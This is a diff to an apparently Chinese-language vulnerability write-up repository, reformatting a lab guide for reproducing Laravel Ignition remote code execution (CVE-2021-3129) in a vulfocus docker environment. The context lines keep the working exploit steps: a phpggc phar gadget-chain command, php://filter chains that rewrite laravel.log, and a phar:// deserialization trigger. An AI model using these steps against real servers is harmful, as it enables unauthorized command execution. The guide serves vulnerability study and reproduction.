writeup

Author: ansanqwq

_sidebar.md

@@ -64,7 +64,7 @@
    * [ThinkPHP5远程代码执行漏洞（CNVD-2018-24942）](writeup/ThinkPHP5远程代码执行漏洞_CNVD-2018-24942_hu4wufu/README.md)
    * [struts2-045（CVE-2017-5638）](writeup/struts2-045_CVE-2017-5638_hu4wufu/README.md)
    * [struts2-052（CVE-2017-9805）](writeup/struts2-052_CVE-2017-9805_hu4wufu/README.md)
-   * [Laravel远程代码执行漏洞（CVE-2021-3129）](Laravel_Debug_mode远程代码执行_anxianglang/CVE-2021-3129.md)
+   * [Laravel远程代码执行漏洞（CVE-2021-3129）](writeup/Laravel_Debug_mode远程代码执行_anxianglang/CVE-2021-3129.md)
 
 
 * 镜像

writeup/Laravel_Debug_mode远程代码执行_anxianglang/CVE-2021-3129.md

@@ -12,31 +12,31 @@ Laravel开启了Debug模式时，由于Laravel自带的Ignition 组件对file_ge
 
 （1）打开vulfocus：http://vulfocus.fofa.so/
 
-![](.\图片1.png)
+<img src="./图片1.png" style="zoom:150%;" />
 
 （2）查找漏洞编号
 
-![](.\图片2.png)
+<img src="./图片2.png" style="zoom:150%;" />
 
 （3）点击启动即可生成镜像
 
-![](.\图片3.png)
+<img src="./图片3.png" style="zoom:150%;" />
 
 （4）也可以在docker hub库中搜索vulfocus镜像
 
-![](.\图片4.png)
+<img src="./图片4.png" style="zoom:150%;" />
 
 （5）选择想要下载的docker环境，点击进去复制下载路径
 
-![](.\图片5.png)
+<img src="./图片5.png" style="zoom:150%;" />
 
 （6）然后在kail上执行复制路径就可以直接下载
 
-`docker pull vulfocus/laravel-cve_2021_3129`![](.\图片6.png)
+`docker pull vulfocus/laravel-cve_2021_3129`<img src="./图片6.png" style="zoom:150%;" />
 
 （7）下载完毕之后就保存在本地的docker库中
 
-`docker images` ![](.\图片7.png)
+`docker images` <img src="./图片7.png" style="zoom:150%;" />
 
 （8）可以用docker run命令直接启动漏洞环境了
 
@@ -60,25 +60,25 @@ Laravel开启了Debug模式时，由于Laravel自带的Ignition 组件对file_ge
 php -d 'phar.readonly=0' ./phpggc monolog/rce1 system id --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())"
 ```
 
-<img src=".\图片8.png" style="zoom:150%;" />
+<img src="./图片8.png" style="zoom:150%;" />
 
 （2）清空log文件
 
 ```
 php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log
 ```
 
-![](.\图片9.png)
+<img src="./图片9.png" style="zoom:150%;" />
 
 （3）给log添加一个前缀
 
 `viewFile: AA`
 
-![](.\图片10.png)
+<img src="./图片10.png" style="zoom:150%;" />
 
 （4）将编完码后的字符写入log中
 
-![](.\图片11.png)
+<img src="./图片11.png" style="zoom:150%;" />
 
 注意：因为每次payload都会写入两次，所有请在payload最后面加上一个字母a，只让payload生效一次
 
@@ -88,31 +88,31 @@ php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|
 php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log
 ```
 
-![](.\图片12.png)
+<img src="./图片12.png" style="zoom:150%;" />
 
 （6）触发phar反序列化执行命令
 
 `phar:///Applications/MxSrvs/www/laravel/storage/logs/laravel.log/test.txt`
 
-![](.\图片13.png)
+<img src="./图片13.png" style="zoom:150%;" />
 
 注意：只有在编辑log的时候返回的是500，其他时候都是200，如有特殊情况需要从第一步从新开始
 
-（7）如果上述方法太复杂也可利用Exp来复现漏洞，输入目标ip和端口![](.\图片14.png)
+（7）如果上述方法太复杂也可利用Exp来复现漏洞，输入目标ip和端口<img src="./图片14.png" style="zoom:150%;" />
 
 用python3运行脚本
 
-<img src=".\图片15.png" style="zoom:150%;" />
+<img src="./图片15.png" style="zoom:150%;" />
 
 注意：Exp脚本要和phpggc文件夹在同一目录下，还要给phpggc执行权限，否则无法复现
 
 （8）Goby中也有该漏洞的Poc用来验证漏洞
 
-![](.\图片16.png)
+<img src="./图片16.png" style="zoom:150%;" />
 
 如果您有自己的Poc也可以通过Goby提交来获得奖金
 
-![](.\图片17.png)
+<img src="./图片17.png" style="zoom:150%;" />
 
 ## **源码分析**